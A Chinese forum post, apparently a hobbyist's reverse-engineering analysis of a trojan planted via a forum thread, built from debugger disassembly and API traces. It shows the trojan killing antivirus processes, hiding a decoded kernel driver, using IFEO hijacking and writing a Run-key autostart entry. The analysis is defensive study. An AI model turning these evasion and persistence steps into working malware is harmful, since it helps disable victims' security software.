今天UPK论坛被无聊人士挂马,打心里BS此类小黑.于是诞生了我的第一篇木马分析.
从http://www.unpack.cn/viewthread.php?tid=42409二楼下载木马主文件.记为A.EXE,脱壳后,分析如下:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>
主程序A.EXE分析
;>>>>>>>>>>>>>>>>>>>>>>>>>>>
00409C6D 68 38954000 push 409538 ; ASCII "tiouy"
00409C72 6A 01 push 1
00409C74 53 push ebx
00409C75 FF15 24104000 call dword ptr ds:[401024] ; KERNEL32.CreateMutexA
创建名为tiouy的互斥体(Mutex),通常用于防止自身重复运行.
0040A07F 8BF0 mov esi,eax
0040A081 68 EC954000 push 4095EC ; ASCII "OpenSCManagerA"
0040A086 56 push esi
压入"OpenSCManagerA"字符串,应是通过GetProcAddress动态取得该API后打开服务控制管理器(SCM).
EAX 77DC4C36 ADVAPI32.OpenServiceA
ECX 001665F8
EDX 0012FE10 ASCII "wscsvc"
打开wscsvc服务(Windows安全中心服务).
00409F31 68 98954000 push 409598 ; ASCII "ControlService"
00409F36 56 push esi
调用ControlService向wscsvc服务发送控制码(具体控制码此处未显示,推测是停止服务).
00409F81 68 B8954000 push 4095B8 ; ASCII "CloseServiceHandle"
00409F86 56 push esi
00409F87 FF15 30104000 call dword ptr ds:[401030] ; KERNEL32.GetProcAddress
调用CloseServiceHandle关闭服务句柄.
0040A988 8A0C33 mov cl,byte ptr ds:[ebx+esi]
0040A98B 8AC3 mov al,bl
0040A98D C0E0 02 shl al,2
0040A990 2C 1E sub al,1E
0040A992 8BFE mov edi,esi
0040A994 02C8 add cl,al
0040A996 33C0 xor eax,eax
0040A998 880C33 mov byte ptr ds:[ebx+esi],cl
0040A99B 83C9 FF or ecx,FFFFFFFF
0040A99E 43 inc ebx
0040A99F F2:AE repne scas byte ptr es:[edi]
0040A9A1 F7D1 not ecx
0040A9A3 49 dec ecx
0040A9A4 3BD9 cmp ebx,ecx
0040A9A6 ^ 72 D6 jb short 0040A97E ; 0040A97E
解码字符串.
结果为:
0012FDEC 65 6B 72 6E 2E 65 78 65 00 04 00 00 65 67 75 69 ekrn.exe...egui
0012FDFC 2E 65 78 65 .exe
0040A5B1 68 F8964000 push 4096F8 ; ASCII "CreateToolhelp32Snapshot"
0040A5B6 56 push esi
0040A4A1 68 B8964000 push 4096B8 ; ASCII "Process32First"
0040A4A6 56 push esi
准备干坏事
0040AA64 /0F84 A8000000 je 0040AB12 ; 0040AB12
0040AA6A |8BAC24 40010000 mov ebp,dword ptr ss:[esp+140]
0040AA71 |8B35 44104000 mov esi,dword ptr ds:[401044] ; KERNEL32.OpenProcess
0040AA77 |8B3D 40104000 mov edi,dword ptr ds:[401040] ; KERNEL32.TerminateProcess
0040AA7D |8D4C24 38 lea ecx,dword ptr ss:[esp+38]
0040AA81 |68 8C974000 push 40978C ; ASCII "360rp.exe"
0040AA86 |51 push ecx
0040AA87 |E8 54FBFFFF call 0040A5E0 ; 0040A5E0
0040AA8C |85C0 test eax,eax
0040AA8E |74 13 je short 0040AAA3 ; 0040AAA3
0040AA90 |8D5424 38 lea edx,dword ptr ss:[esp+38]
0040AA94 |68 80974000 push 409780 ; ASCII "360sd.exe"
0040AA99 |52 push edx
0040AA9A |E8 41FBFFFF call 0040A5E0 ; 0040A5E0
0040AA9F |85C0 test eax,eax
0040AAA1 |75 37 jnz short 0040AADA ; 0040AADA
0040AAA3 |8B4424 1C mov eax,dword ptr ss:[esp+1C]
0040AAA7 |50 push eax
0040AAA8 |6A 00 push 0
0040AAAA |68 FF0F1F00 push 1F0FFF
0040AAAF |FFD6 call esi
0040AAB1 |6A 00 push 0
0040AAB3 |50 push eax
0040AAB4 |FFD7 call edi
0040AAB6 |8D4C24 38 lea ecx,dword ptr ss:[esp+38]
0040AABA |51 push ecx
0040AABB |E8 800A0000 call 0040B540 ; 0040B540
0040AAC0 |6A 00 push 0
0040AAC2 |6A 00 push 0
0040AAC4 |68 6C974000 push 40976C ; ASCII " /f /im 360rp.exe"
0040AAC9 |68 60974000 push 409760 ; ASCII "taskkill"
0040AACE |6A 00 push 0
0040AAD0 |6A 00 push 0
0040AAD2 |E8 09F7FFFF call 0040A1E0 ; 0040A1E0
0040AAD7 |83C4 1C add esp,1C
0040AADA |E8 01FFFFFF call 0040A9E0 ; 0040A9E0
0040AADF |85C0 test eax,eax
0040AAE1 ^|0F85 5BFFFFFF jnz 0040AA42 ; 0040AA42
0040AAE7 |8D5424 38 lea edx,dword ptr ss:[esp+38]
0040AAEB |55 push ebp
0040AAEC |52 push edx
0040AAED |E8 EEFAFFFF call 0040A5E0 ; 0040A5E0
0040AAF2 |85C0 test eax,eax
0040AAF4 |74 14 je short 0040AB0A ; 0040AB0A
0040AAF6 |8D4424 14 lea eax,dword ptr ss:[esp+14]
0040AAFA |50 push eax
0040AAFB |53 push ebx
0040AAFC |E8 CFF9FFFF call 0040A4D0 ; 0040A4D0
0040AB01 |85C0 test eax,eax
0040AB03 |74 0D je short 0040AB12 ; 0040AB12
0040AB05 ^|E9 73FFFFFF jmp 0040AA7D ; 0040AA7D
0040AB0A |C74424 10 01000>mov dword ptr ss:[esp+10],1
0040AB12 \53 push ebx
一个循环:逐个枚举进程,匹配到360rp.exe/360sd.exe时,先用OpenProcess(1F0FFF即PROCESS_ALL_ACCESS)+TerminateProcess结束它,再call 0040B540(后文可见是写IFEO Debugger项的函数),最后调用taskkill /f /im 360rp.exe补刀,干掉360杀毒.
00409D12 BE 10B84000 mov esi,40B810 ; ASCII "C:\WINDOWS\system32\K5C21.exe"
00409D17 68 04010000 push 104
00409D1C 56 push esi
00409D1D FF15 38104000 call dword ptr ds:[401038] ; KERNEL32.GetSystemDirectoryA
00409D23 8B3D 68104000 mov edi,dword ptr ds:[401068] ; KERNEL32.lstrcatA
00409D29 68 34954000 push 409534
00409D2E 56 push esi
00409D2F FFD7 call edi
00409D31 8D45 F4 lea eax,dword ptr ss:[ebp-C]
00409D34 50 push eax
00409D35 56 push esi
00409D36 FFD7 call edi
00409D38 68 2C954000 push 40952C ; ASCII ".exe"
00409D3D 56 push esi
获取系统目录,准备生成文件了.
0040AE85 BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AE8A 83C9 FF or ecx,FFFFFFFF
0040AE8D F2:AE repne scas byte ptr es:[edi]
0040AE8F F7D1 not ecx
0040AE91 2BF9 sub edi,ecx
0040AE93 68 D8B64000 push 40B6D8
0040AE98 8BC1 mov eax,ecx
0040AE9A 8BF7 mov esi,edi
0040AE9C BF D8B64000 mov edi,40B6D8
0040AEA1 C1E9 02 shr ecx,2
0040AEA4 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040AEA6 8BC8 mov ecx,eax
0040AEA8 83E1 03 and ecx,3
0040AEAB F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
0040AEAD 8D4C24 3C lea ecx,dword ptr ss:[esp+3C]
0040AEB1 51 push ecx
0040AEB2 E8 29F7FFFF call 0040A5E0 ; 0040A5E0
0040AEB7 85C0 test eax,eax
0040AEB9 75 08 jnz short 0040AEC3 ; 0040AEC3
0040AEBB C74424 10 01000>mov dword ptr ss:[esp+10],1
0040AEC3 6A 01 push 1
0040AEC5 E8 46EFFFFF call 00409E10 ; 00409E10
0040AECA BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AECF 83C9 FF or ecx,FFFFFFFF
0040AED2 33C0 xor eax,eax
0040AED4 F2:AE repne scas byte ptr es:[edi]
0040AED6 F7D1 not ecx
0040AED8 49 dec ecx
0040AED9 83F9 06 cmp ecx,6
0040AEDC 76 42 jbe short 0040AF20 ; 0040AF20
0040AEDE 8D5424 38 lea edx,dword ptr ss:[esp+38]
0040AEE2 68 ECB64000 push 40B6EC ; ASCII "ras.exe"
0040AEE7 52 push edx
0040AEE8 E8 F3F6FFFF call 0040A5E0 ; 0040A5E0
0040AEED 85C0 test eax,eax
0040AEEF 75 2F jnz short 0040AF20 ; 0040AF20
0040AEF1 8B4424 1C mov eax,dword ptr ss:[esp+1C]
0040AEF5 50 push eax
0040AEF6 E8 55FEFFFF call 0040AD50 ; 0040AD50
0040AEFB 83C4 04 add esp,4
0040AEFE 8D4C24 38 lea ecx,dword ptr ss:[esp+38]
0040AF02 68 E4974000 push 4097E4 ; ASCII "rstray.exe"
0040AF07 51 push ecx
0040AF08 E8 D3F6FFFF call 0040A5E0 ; 0040A5E0
0040AF0D 85C0 test eax,eax
0040AF0F 75 0F jnz short 0040AF20 ; 0040AF20
0040AF11 E8 9A010000 call 0040B0B0 ; 0040B0B0
0040AF16 68 D0070000 push 7D0
0040AF1B E8 F0EEFFFF call 00409E10 ; 00409E10
0040AF20 43 inc ebx
0040AF21 83FB 12 cmp ebx,12
0040AF24 ^ 0F8E F6FEFFFF jle 0040AE20 ; 0040AE20
0040AF2A 8D5424 14 lea edx,dword ptr ss:[esp+14]
0040AF2E 52 push edx
0040AF2F 55 push ebp
0040AF30 E8 9BF5FFFF call 0040A4D0 ; 0040A4D0
0040AF35 85C0 test eax,eax
0040AF37 ^ 0F85 E1FEFFFF jnz 0040AE1E ; 0040AE1E
0040AF3D 55 push ebp
0040AF3E E8 CDF5FFFF call 0040A510 ; 0040A510
0040AF43 8B4424 10 mov eax,dword ptr ss:[esp+10]
0040AF47 85C0 test eax,eax
0040AF49 74 6C je short 0040AFB7 ; 0040AFB7
0040AF4B BB BC464000 mov ebx,4046BC
0040AF50 8B3B mov edi,dword ptr ds:[ebx]
0040AF52 83C9 FF or ecx,FFFFFFFF
0040AF55 33C0 xor eax,eax
0040AF57 68 ECB64000 push 40B6EC ; ASCII "ras.exe"
0040AF5C F2:AE repne scas byte ptr es:[edi]
0040AF5E F7D1 not ecx
0040AF60 2BF9 sub edi,ecx
0040AF62 8BC1 mov eax,ecx
0040AF64 8BF7 mov esi,edi
0040AF66 BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AF6B C1E9 02 shr ecx,2
0040AF6E F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040AF70 8BC8 mov ecx,eax
0040AF72 83E1 03 and ecx,3
0040AF75 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
0040AF77 E8 E4F9FFFF call 0040A960 ; 0040A960
0040AF7C BF 2C954000 mov edi,40952C ; ASCII ".exe"
0040AF81 83C9 FF or ecx,FFFFFFFF
0040AF84 33C0 xor eax,eax
0040AF86 83C4 04 add esp,4
0040AF89 F2:AE repne scas byte ptr es:[edi]
0040AF8B F7D1 not ecx
0040AF8D 2BF9 sub edi,ecx
0040AF8F 83C3 04 add ebx,4
0040AF92 8BF7 mov esi,edi
0040AF94 8BD1 mov edx,ecx
0040AF96 BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AF9B 83C9 FF or ecx,FFFFFFFF
0040AF9E F2:AE repne scas byte ptr es:[edi]
0040AFA0 8BCA mov ecx,edx
0040AFA2 4F dec edi
0040AFA3 C1E9 02 shr ecx,2
0040AFA6 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040AFA8 8BCA mov ecx,edx
0040AFAA 83E1 03 and ecx,3
0040AFAD 81FB DC464000 cmp ebx,4046DC
0040AFB3 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
0040AFB5 ^ 7E 99 jle short 0040AF50 ; 0040AF50
0040AFB7 5F pop edi
0040AFB8 5E pop esi
0040AFB9 5B pop ebx
0040AFBA 33C0 xor eax,eax
0040AFBC 5D pop ebp
0040AFBD 81C4 2C010000 add esp,12C
0040AFC3 C3 retn
循环解码杀软进程字符串,干掉瑞星,咔吧,金山等...
0012FDF8 61 76 70 2E 65 78 65 00 33 36 30 74 72 61 79 2E avp.exe.360tray.
0012FE08 65 78 65 00 73 61 66 65 62 6F 78 74 72 61 79 2E exe.safeboxtray.
0012FE18 65 78 65 00 exe.
干掉咔吧和360主程序及保险箱.
00409A3A FF15 60104000 call dword ptr ds:[401060] ; KERNEL32.GetTickCount
00409A40 6A 0A push 0A
00409A42 33D2 xor edx,edx
00409A44 59 pop ecx
00409A45 F7F1 div ecx
00409A47 8BF0 mov esi,eax
00409A49 8D4424 24 lea eax,dword ptr ss:[esp+24]
00409A4D 50 push eax
00409A4E 68 04010000 push 104
00409A53 FF15 64104000 call dword ptr ds:[401064] ; KERNEL32.GetTempPathA
00409A59 8D4424 10 lea eax,dword ptr ss:[esp+10]
00409A5D 6A 0A push 0A
用GetTickCount()/10的商作为数A,再用GetTempPathA获取临时文件目录.
0040B872 00 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 .C:\DOCUME~1\AD
0040B882 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C MINI~1\LOCALS~1\
0040B892 54 65 6D 70 5C 7E 32 32 38 32 37 38 2E 65 78 00 Temp\~228278.ex.
生成一个~A.ex文件(后文CreateServiceA以SERVICE_KERNEL_DRIVER类型加载它,可知是驱动文件).
0040B630 33C0 xor eax,eax
0040B632 B1 0F mov cl,0F
0040B634 8A90 64694000 mov dl,byte ptr ds:[eax+406964]
0040B63A 32D1 xor dl,cl
0040B63C 8890 64694000 mov byte ptr ds:[eax+406964],dl
0040B642 40 inc eax
0040B643 3D 002A0000 cmp eax,2A00
0040B648 ^ 7C EA jl short 0040B634 ; 0040B634
~A.ex的解码过程.
00406964 42 0F 9F 0F 0C 0F 0F 0F 0B 0F 0F 0F F0 F0 0F 0F B?.痧
00406974 B7 0F 0F 0F 0F 0F 0F 0F 4F 0F 0F 0F 0F 0F 0F 0F ?O
00406984 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F
00406994 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F EF 0F 0F 0F ?
004069A4 01 10 B5 01 0F BB 06 C2 2E B7 0E 43 C2 2E 5B 67 ????C?[g
解码前
00406964 4D 00 90 00 03 00 00 00 04 00 00 00 ?? ?? ?? ?? M.?......????
00406974 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00406984 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00406994 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
004069A4 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ?.???L?Th
解码后
PE头部的MZ标志少了一个Z,别急,他后面还会补上.难道是先写一个不完整的PE头再补完,用来欺骗杀毒软件的主动防御?
0012FC8C 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FC90 0040B874 |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
0012FC94 40000000 |Access = GENERIC_WRITE
0012FC98 00000001 |ShareMode = FILE_SHARE_READ
0012FC9C 00000000 |pSecurity = NULL
0012FCA0 00000002 |Mode = CREATE_ALWAYS
0012FCA4 00000000 |Attributes = 0
0012FCA8 00000000 \hTemplateFile = NULL
开始创建了
0012FC9C 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCA0 00000074 |hFile = 00000074
0012FCA4 00406964 |Buffer = 复件_a.00406964
0012FCA8 00002A00 |nBytesToWrite = 2A00 (10752.)
0012FCAC 0012FCDC |pBytesWritten = 0012FCDC
0012FCB0 00000000 \pOverlapped = NULL
写入内容.
0012FC98 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FC9C 0040B874 |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
0012FCA0 C0000000 |Access = GENERIC_READ|GENERIC_WRITE
0012FCA4 00000001 |ShareMode = FILE_SHARE_READ
0012FCA8 00000000 |pSecurity = NULL
0012FCAC 00000003 |Mode = OPEN_EXISTING
0012FCB0 00000000 |Attributes = 0
0012FCB4 00000000 \hTemplateFile = NULL
又重新打开.注意这里的Mode = OPEN_EXISTING
0012FCB0 00409E77 /CALL 到 SetFilePointer 来自 复件_a.00409E75
0012FCB4 00000074 |hFile = 00000074
0012FCB8 00000001 |OffsetLo = 1
0012FCBC 00000000 |pOffsetHi = NULL
0012FCC0 00000000 \Origin = FILE_BEGIN
指针指向1位置.
0012FCA8 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCAC 00000074 |hFile = 00000074
0012FCB0 00409508 |Buffer = 复件_a.00409508
0012FCB4 00000001 |nBytesToWrite = 1
0012FCB8 0012FCF0 |pBytesWritten = 0012FCF0
0012FCBC 00000000 \pOverlapped = NULL
补上故意漏掉的Z(MZ标志的第2个字节)...目的是绕过启发式扫描???
0012FCB0 00409E77 /CALL 到 SetFilePointer 来自 复件_a.00409E75
0012FCB4 00000074 |hFile = 00000074
0012FCB8 000019C8 |OffsetLo = 19C8 (6600.)
0012FCBC 00000000 |pOffsetHi = NULL
0012FCC0 00000000 \Origin = FILE_BEGIN
指针指向19C8
0012FCA8 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCAC 00000074 |hFile = 00000074
0012FCB0 00409504 |Buffer = 复件_a.00409504
0012FCB4 00000001 |nBytesToWrite = 1
0012FCB8 0012FCF0 |pBytesWritten = 0012FCF0
0012FCBC 00000000 \pOverlapped = NULL
00409504 51 00 00 00 5A 00 00 00 65 00 00 00 2E 65 78 00 Q...Z...e....ex.
补上一个Q
0012FCB0 00409E77 /CALL 到 SetFilePointer 来自 复件_a.00409E75
0012FCB4 00000074 |hFile = 00000074
0012FCB8 00000065 |OffsetLo = 65 (101.)
0012FCBC 00000000 |pOffsetHi = NULL
0012FCC0 00000000 \Origin = FILE_BEGIN
指向65
0012FCA8 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCAC 00000074 |hFile = 00000074
0012FCB0 00409500 |Buffer = 复件_a.00409500
0012FCB4 00000001 |nBytesToWrite = 1
0012FCB8 0012FCF0 |pBytesWritten = 0012FCF0
0012FCBC 00000000 \pOverlapped = NULL
00409500 72 00 00 00 51 00 00 00 5A 00 00 00 65 00 00 00 r...Q...Z...e...
补上一个r
0040A521 68 D8964000 push 4096D8 ; ASCII "CloseHandle"
0040A526 56 push esi
0040A527 FF15 30104000 call dword ptr ds:[401030] ; KERNEL32.GetProcAddress
终于完事了
0012FC9C 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FCA0 0040B978 |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.exe"
0012FCA4 40000000 |Access = GENERIC_WRITE
0012FCA8 00000001 |ShareMode = FILE_SHARE_READ
0012FCAC 00000000 |pSecurity = NULL
0012FCB0 00000002 |Mode = CREATE_ALWAYS
0012FCB4 00000000 |Attributes = 0
0012FCB8 00000000 \hTemplateFile = NULL
新建~A.EXE,主文件名与前面生成的驱动文件~A.ex相同,只是扩展名不同.
0012FCAC 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCB0 00000074 |hFile = 00000074
0012FCB4 00404764 |Buffer = 复件_a.00404764
0012FCB8 00002200 |nBytesToWrite = 2200 (8704.)
0012FCBC 0012FCF0 |pBytesWritten = 0012FCF0
0012FCC0 00000000 \pOverlapped = NULL
00404764 4D 5A 90 00 03 00 00 00 04 00 00 00 ?? ?? ?? ?? MZ??????????????
00404774 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00404784 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00404794 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
004047A4 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ?.???L?Th
004047B4 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
004047C4 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
004047D4 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
004047E4 49 20 90 D9 0D 41 FE 8A 0D 41 FE 8A 0D 41 FE 8A I 愘.A.A.A
004047F4 76 5D F2 8A 0C 41 FE 8A 62 5E FA 8A 0F 41 FE 8A v]驃.Ab^鷬A
写入内容.这次他没有折腾了..
0012FC9C 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FCA0 0040B810 |FileName = "C:\WINDOWS\system32\K5C21.exe"
0012FCA4 40000000 |Access = GENERIC_WRITE
0012FCA8 00000001 |ShareMode = FILE_SHARE_READ
0012FCAC 00000000 |pSecurity = NULL
0012FCB0 00000002 |Mode = CREATE_ALWAYS
0012FCB4 00000000 |Attributes = 0
0012FCB8 00000000 \hTemplateFile = NULL
生成这么个东东.记为B.EXE
0012FCAC 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCB0 00000074 |hFile = 00000074
0012FCB4 00404764 |Buffer = 复件_a.00404764
0012FCB8 00002200 |nBytesToWrite = 2200 (8704.)
0012FCBC 0012FCF0 |pBytesWritten = 0012FCF0
0012FCC0 00000000 \pOverlapped = NULL
内容跟~A.EXE一模一样(同一缓冲区00404764,0x2200字节).恩,留个后路...
004098A0 E8 5B100000 call 0040A900 ; 0040A900
004098A5 6A 07 push 7
004098A7 BE D4944000 mov esi,4094D4
004098AC 59 pop ecx
004098AD 8D7D 88 lea edi,dword ptr ss:[ebp-78]
004098B0 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004098B2 A4 movs byte ptr es:[edi],byte ptr ds:[esi]
004098B3 6A 0A push 0A
004098B5 33C0 xor eax,eax
004098B7 59 pop ecx
004098B8 8D7D A5 lea edi,dword ptr ss:[ebp-5B]
004098BB F3:AB rep stos dword ptr es:[edi]
004098BD 8D45 88 lea eax,dword ptr ss:[ebp-78]
004098C0 50 push eax
004098C1 E8 3A100000 call 0040A900 ; 0040A900
004098C6 6A 05 push 5
004098C8 BE BC944000 mov esi,4094BC
004098CD 59 pop ecx
004098CE 8D7D D0 lea edi,dword ptr ss:[ebp-30]
004098D1 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004098D3 8D45 D0 lea eax,dword ptr ss:[ebp-30]
004098D6 50 push eax
004098D7 66:A5 movs word ptr es:[edi],word ptr ds:[esi]
004098D9 E8 22100000 call 0040A900 ; 0040A900
004098DE 83C4 0C add esp,0C
004098E1 8D45 D0 lea eax,dword ptr ss:[ebp-30]
004098E4 50 push eax
004098E5 8D45 88 lea eax,dword ptr ss:[ebp-78]
004098E8 50 push eax
004098E9 FF15 68104000 call dword ptr ds:[401068] ; KERNEL32.lstrcatA
004098EF 8D45 FC lea eax,dword ptr ss:[ebp-4]
004098F2 50 push eax
004098F3 68 3F000F00 push 0F003F
004098F8 8D45 88 lea eax,dword ptr ss:[ebp-78]
004098FB 6A 00 push 0
004098FD 50 push eax
004098FE FF75 08 push dword ptr ss:[ebp+8]
00409901 FF15 04104000 call dword ptr ds:[401004] ; ADVAPI32.RegOpenKeyExA
call 0040A900这个前面提到过了,是字符串解码函数.解码结果如下:
0012FD94 53 4F 46 54 57 41 52 45 5C 5C 4D 69 63 72 6F 73 SOFTWARE\\Micros
0012FDA4 6F 66 74 5C 5C 57 69 6E 64 6F 77 73 5C 5C 43 75 oft\\Windows\\Cu
0012FDB4 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 5C 52 75 rrentVersion\\Ru
0012FDC4 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 n...............
0012FDD4 00 00 00 00 00 00 00 00 5C 5C 43 75 72 72 65 6E ........\\Curren
0012FDE4 74 56 65 72 73 69 6F 6E 5C 5C 52 75 6E 00 00 00 tVersion\\Run...
0012FDF4 6D 73 63 6F 6E 66 69 67 00 00 00 00 00 00 00 00 msconfig........
0012FD7C 0012FD94 |Subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
打开这个项
0012FD74 00000000 |hKey = 0
0012FD78 0012FDF4 |ValueName = "msconfigs"
0012FD7C 00000000 |Reserved = 0
0012FD80 00000001 |ValueType = REG_SZ
0012FD84 0040B810 |Buffer = 复件_a.0040B810
0012FD88 0000003C \BufSize = 3C (60.)
0012FD8C 7C834D59 KERNEL32.lstrcatA
0012FD90 0040B810 ASCII "C:\WINDOWS\system32\K5C21.exe"
在Run项下写入名为msconfigs、类型为REG_SZ的值,内容为C:\WINDOWS\system32\K5C21.exe,以此实现开机自启动.
0040A6FF 68 48974000 push 409748 ; ASCII "SeDebugPrivilege"
0040A704 6A 00 push 0
0040A706 FF15 0C104000 call dword ptr ds:[40100C] ; ADVAPI32.LookupPrivilegeValueA
0040A70C 85C0 test eax,eax
0040A70E 74 28 je short 0040A738 ; 0040A738
0040A710 8B4C24 00 mov ecx,dword ptr ss:[esp]
0040A714 6A 00 push 0
0040A716 6A 00 push 0
0040A718 8D4424 0C lea eax,dword ptr ss:[esp+C]
0040A71C 6A 00 push 0
0040A71E 50 push eax
0040A71F 6A 00 push 0
0040A721 51 push ecx
0040A722 C74424 1C 01000>mov dword ptr ss:[esp+1C],1
0040A72A C74424 28 02000>mov dword ptr ss:[esp+28],2
0040A732 FF15 08104000 call dword ptr ds:[401008] ; ADVAPI32.AdjustTokenPrivileges
通过LookupPrivilegeValueA+AdjustTokenPrivileges启用SeDebugPrivilege(用于打开并结束其他进程),提权,准备干坏事.
0012FD30 0040A014 /CALL 到 CreateServiceA 来自 复件_a.0040A012
0012FD34 001664C0 |hManager = 001664C0
0012FD38 0040975C |ServiceName = "xx"
0012FD3C 0040975C |DisplayName = "xx"
0012FD40 000F01FF |DesiredAccess = SERVICE_ALL_ACCESS
0012FD44 00000001 |ServiceType = SERVICE_KERNEL_DRIVER
0012FD48 00000003 |StartType = SERVICE_DEMAND_START
0012FD4C 00000001 |ErrorControl = SERVICE_ERROR_NORMAL
0012FD50 0040B874 |BinaryPathName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
0012FD54 00000000 |LoadOrderGroup = NULL
0012FD58 00000000 |pTagId = NULL
0012FD5C 00000000 |pDependencies = NULL
0012FD60 00000000 |ServiceStartName = NULL
0012FD64 00000000 \Password = NULL
用CreateServiceA新建内核驱动服务(ServiceType=SERVICE_KERNEL_DRIVER),映像路径指向刚写好的~A.ex.服务名比较XX...
0040A041 68 DC954000 push 4095DC ; ASCII "StartServiceA"
0040A046 56 push esi
启动服务.
0012FDAC 00409EB8 /CALL 到 DeleteFileA 来自 复件_a.00409EB6
0012FDB0 0040B874 \FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
启动服务后随即删除磁盘上的~A.ex,毁尸灭迹.
0012FDA4 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FDA8 0012FDF4 |FileName = "\\.\ao1"
0012FDAC 80000000 |Access = GENERIC_READ
0012FDB0 00000000 |ShareMode = 0
0012FDB4 00000000 |pSecurity = NULL
0012FDB8 00000003 |Mode = OPEN_EXISTING
0012FDBC 00000000 |Attributes = 0
0012FDC0 00000000 \hTemplateFile = NULL
打开设备\\.\ao1(推测是刚加载的驱动创建的设备对象).
00409BFA FF15 54104000 call dword ptr ds:[401054] ; KERNEL32.DeviceIoControl
0012FDCC 00000084 |hDevice = 00000084 (window)
0012FDD0 0022001C |IoControlCode = 22001C
0012FDD4 00404764 |InBuffer = 复件_a.00404764
0012FDD8 00002200 |InBufferSize = 2200 (8704.)
0012FDDC 00000000 |OutBuffer = NULL
0012FDE0 00000000 |OutBufferSize = 0
0012FDE4 0012FDFC |pBytesReturned = 0012FDFC
0012FDE8 00000000 \pOverlapped = NULL
00404764 4D 5A 90 00 03 00 00 00 04 00 00 00 ?? ?? ?? ?? MZ?......????
00404774 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00404784 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00404794 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
004047A4 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ?.???L?Th
004047B4 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
004047C4 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
004047D4 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
004047E4 49 20 90 D9 0D 41 FE 8A 0D 41 FE 8A 0D 41 FE 8A I 愘.A.A.A
004047F4 76 5D F2 8A 0C 41 FE 8A 62 5E FA 8A 0F 41 FE 8A v]驃.Ab^鷬A
通过DeviceIoControl(控制码22001C)把00404764处0x2200字节的PE镜像(与B.EXE文件内容相同)发给驱动,具体用途由驱动决定,这里看不出来.
00409C06 6A 05 push 5
00409C08 68 78B94000 push 40B978 ; ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1
\Temp\~228278.exe"
00409C0D FF15 58104000 call dword ptr ds:[401058] ; KERNEL32.WinExec
"PUSH 5"(nCmdShow=SW_SHOW)后用WinExec光明正大运行木马.....太可耻了
0040B554 68 08474000 push 404708 ; ASCII "SOFTWARE\Microsoft\Windows
NT\currentVersion\image file Execution options\"
0040B559 F3:AB rep stos dword ptr es:[edi]
0040B55B 66:AB stos word ptr es:[edi]
0040B55D AA stos byte ptr es:[edi]
0040B55E 8D4424 0C lea eax,dword ptr ss:[esp+C]
0040B562 50 push eax
0040B563 FF15 4C104000 call dword ptr ds:[40104C] ; KERNEL32.lstrcpyA
0040B569 8B8C24 84000000 mov ecx,dword ptr ss:[esp+84]
0040B570 8D5424 08 lea edx,dword ptr ss:[esp+8]
0040B574 51 push ecx
0040B575 52 push edx
0040B576 FF15 68104000 call dword ptr ds:[401068] ; KERNEL32.lstrcatA
0040B57C 8D4424 04 lea eax,dword ptr ss:[esp+4]
